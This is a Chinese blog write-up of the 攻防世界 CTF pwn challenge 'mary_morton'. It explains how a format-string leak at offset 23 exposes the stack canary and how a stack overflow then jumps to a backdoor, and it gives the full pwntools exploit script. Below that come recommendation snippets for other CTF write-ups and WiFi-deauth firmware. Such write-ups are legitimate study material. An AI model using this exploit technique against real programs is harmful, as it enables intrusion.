(攻防世界)(pwn)mary_mroton

最新推荐文章于 2023-10-30 19:01:30 发布
最新推荐文章于 2023-10-30 19:01:30 发布
阅读量844 收藏 1
点赞数
文章标签: pwn canary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/96600301
版权

经过一段时间的研究,终于接触到Canary了,不容易啊

拿到本题查看保护
在这里插入图片描述
开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑:
在这里插入图片描述
根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。

我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填入即可。

查看IDA可以发现,程序留了后门:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
我们知道,通过格式字符串漏洞泄露参数,要知道输入参数距离我们要泄露的参数的位置,这里是23.
为什么是23呢?
首先,我们可以看到伪C代码:
在这里插入图片描述
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90,故,我们的相对偏移为0x90-0x8=0x88,真的是这样吗?
答案并不是这样的。
在这里插入图片描述

我们可以看到图片中参数位置是6位,故参数偏移为6+0x88/8=6+17=23.
好的,我们知道偏移为23后,我们就可以利用程序1中的栈溢出漏洞了
完整exp如下:

#! /usr/bin/env python
from pwn import *
p=remote('111.198.29.45',56493)
elf=ELF('./mary_morton')
p.sendlineafter('3. Exit the battle \n','2')
p.sendline('%23$p')
sleep(0.3)
p.recvuntil('0x')
canary=int(p.recv(16),16)
print hex(canary)
flag_addr=0x4008da
p.sendline('1')
payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr)
p.send(payload)
print p.recvall()
PLpa、
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
攻防世界-CGfsb详细知识点及解答
m0_74047686的博客
03-07 692
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 176
做题记录
攻防世界-CGfsb
yuqie的博客
06-30 287
看看附件,先在本地环境打一下,先放入kali查看一下版本: 再查看一下保护机制: 可以看出该程序是32位的,保护机制的解释如下:【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表。【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过。【3】NX:NX enabled
C表达式((void (*)(void))0();
雾里看花
11-17 1705
C表达式((void (*)(void))0();通过一步步来讲解: 没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内,跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。(yo
攻防世界pwn【guess_num】
最新发布
SUOYE_GUANXING的博客
10-30 110
flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;0x30-0x10;需要0x20个字符来让它溢出;使用ida64打开;进入gets漏洞点看;
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3356
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
CTF writeup之pwn2own warehouse
chenzhenyu1983的博客
11-23 637
近来练习CTF,主要是PWN,有点小心得。分享一系列的writeup。 这题是pwn2own的一道pwn题--warehous。 一、题目分析 elf文件打开了NX和canary。 分析一下题目功能 题目还是比较简单的。在main函数里能调用store函数,并实现任意地址写。即可以跳过canary覆盖返回地址。并实现ROP。最终调用system("sh")
攻防世界pwn——stack2
qq_62076255的博客
12-18 586
攻防世界pwn——stack2做题记录
攻防世界pwn高手区stack2 lea调整栈帧导致偏移错误
Gtooler的博客
10-14 1730
Stack2 这题废话很多,说白了就一个数组越界的漏洞可以利用,没有对下标v5做限定,所以可以利用数组越界,直接越过canary,利用留下的后门getshell 刚开始看ida以为位移是0x74所以exp如下 from pwn import * p = remote('111.200.241.244', '50928') # p = process("./stack2") # context.log_level = 'debug' hackhere = [0x9b, 0x85, 0x04, 0x08
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1108
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
[攻防世界]guess_num
逆向萌新的博客
06-01 680
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界——pwn_forgot
syk的博客
05-28 1705
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
攻防世界-pwn when_did_you_born(栈覆盖)
菜的只能随便写写博客
08-10 1393
0x01 拿到文件之后,先检查文件的基本信息 文件信息 64bit elf可执行文件 无PIE保护   0x02 执行文件 文件之中有两个输入,第一个输入有回显   0x03 IDA静态分析 可以看出获取flag需要用到v5的值,首先需要v5不等于1926,进入else这个块之中,然后又需要v5等于1926才能获取flag,就产生了矛盾。 结合程序有两个输入,可以考...
攻防世界re --- srm-50
archli的博客
09-07 1029
一看是exe文件,那就要先大胆尝试运行一下 我还在猜想会不会邮箱和输入的字符串之间有什么对应的关系,先打开ida观察一下 瞅一眼函数就这俩有用的。 先看winmain, 先普及一下知识吧, 说的很明白,不用多想,里面有个dialogfun函数,问题应该在这里面。 这些都是废话,查一查就知道是说模板的,往下看 第一个if,我以为有点什么后来发现不过是检查邮箱中@和.什么的 那么重要的不过就...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值